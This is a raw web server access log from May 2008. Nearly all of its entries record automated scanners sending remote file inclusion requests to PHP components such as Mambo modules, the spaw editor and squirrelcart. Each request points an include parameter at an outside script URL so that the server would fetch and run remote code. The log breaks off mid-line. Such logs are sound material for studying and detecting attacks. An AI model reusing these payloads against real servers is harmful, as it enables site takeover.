91.121.94.156 - - [04/May/2008:13:13:04 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:13:06 -0700] "GET /logs/access_080131.log//squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:13:06 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:13:07 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.12.225 - - [04/May/2008:13:13:14 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.31.222 - - [04/May/2008:13:13:23 -0700] "GET /logs/access_080130.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:13:28 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:13:28 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:13:28 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:13:13:32 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:13:13:32 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:13:32 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:13:13:33 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:13:38 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:13:39 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:13:39 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:13:45 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:13:45 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:13:46 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:13:47 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:13:47 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:13:48 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:13:51 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:13:57 -0700] "GET /logs/access_071220.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:13:57 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:13:58 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:13:14:03 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:13:14:03 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:13:14:03 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:14:04 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:14:08 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:14:10 -0700] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:14:21 -0700] "GET /logs/access_080131.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:14:27 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:14:27 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:14:28 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:14:46 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:13:14:52 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:14:53 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:13:14:56 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:13:14:57 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:14:59 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:14:59 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:14:59 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:14:59 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:14:59 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:14:59 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:13:15:07 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:15:11 -0700] "GET /logs/access_080215.log//squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:13:15:13 -0700] "GET /logs//admin.php?include_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:13:15:14 -0700] "GET //admin.php?include_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:15:46 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:13:16:01 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:13:16:06 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:13:16:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:13:16:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:16:37 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:16:38 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:16:38 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:16:39 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:16:42 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:16:52 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:16:52 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:16:52 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:16:52 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:16:52 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:16:52 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.95.186 - - [04/May/2008:13:16:54 -0700] "GET /logs/access_071218.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [04/May/2008:13:16:57 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [04/May/2008:13:16:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [04/May/2008:13:16:58 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [04/May/2008:13:16:59 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [04/May/2008:13:17:00 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:17:06 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:17:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:17:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:17:13 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:17:13 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:17:16 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:17:17 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:17:21 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:13:17:30 -0700] "GET /logs/access_080218.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:17:36 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:17:38 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:17:38 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:17:38 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:17:38 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:17:39 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:17:39 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:13:17:43 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:17:45 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:17:45 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:47 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:47 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:47 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:47 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:47 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:47 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:17:53 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:17:54 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:17:55 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:17:56 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:17:57 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:17:58 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:58 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:17:58 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:18:01 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:18:01 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:18:01 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [04/May/2008:13:18:03 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fd